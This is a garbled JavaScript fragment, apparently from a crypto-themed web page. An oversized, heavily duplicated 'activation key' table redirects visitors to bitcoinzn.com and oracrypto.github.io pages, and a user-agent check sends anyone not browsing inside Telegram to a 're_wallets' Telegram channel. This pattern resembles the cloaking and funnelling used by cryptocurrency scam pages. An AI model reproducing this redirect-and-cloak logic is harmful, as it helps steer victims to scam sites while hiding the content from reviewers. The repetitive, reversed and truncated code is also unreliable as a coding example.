 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/bn/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/b5/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "ZXS4CD5FVUwerG": "https://oracrypto.github.io/4b/",    "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "https://www.bitcoinzn.com",
"AXSERBGYU9GNH": "XECRTVBYUNIM",   "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "XRTYIJR56543WSD": "https://oracrypto.github.io/B4/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "w4xe5cr6tv7bymiop": "https://oracrypto.github.io/wer/", "A4SE5DRTYUVYBIUNLK": "TBYUNMILCVGBHJN", "AXSERBGYU9GNH": "XECRTVBYUNIM",   "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",     "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",     "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "K8W56SC2CJ98HV": "https://oracrypto.github.io/B6/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",   "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",     "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com",








  
            "AXSERBGYU9GNH": "www.esdrtfgyuhj.site"











              
               
            };

            
            if (keyMappings[key]) {
                window.location.href = keyMappings[key]; 
            } else {
                errorMessage.textContent = "Invalid activation key";
                errorMessage.style.display = "block";
            }
        }

window.onload = function() {
      const userAgent = navigator.userAgent || navigator.vendor || window.opera;

        const isTelegram = userAgent.toLowerCase().includes("telegram");

      if (!isTelegram) {
          window.location.href = "https://t.me/re_wallets";
      }
      }


document.addEventListener('click', function(event) {
   
    if (document.activeElement && (document.activeElement.tagName === "INPUT" || document.activeElement.tagName === "TEXTAREA")) {
       
    }
    window.onload = function() {
      const userAgent = navigator.userAgent || navigator.vendor || window.opera;

        const isTelegram = userAgent.toLowerCase().includes("telegram");

      if (!isTelegram) {
          window.location.href = "https://t.me/re_wallets";
      }
      };        
});
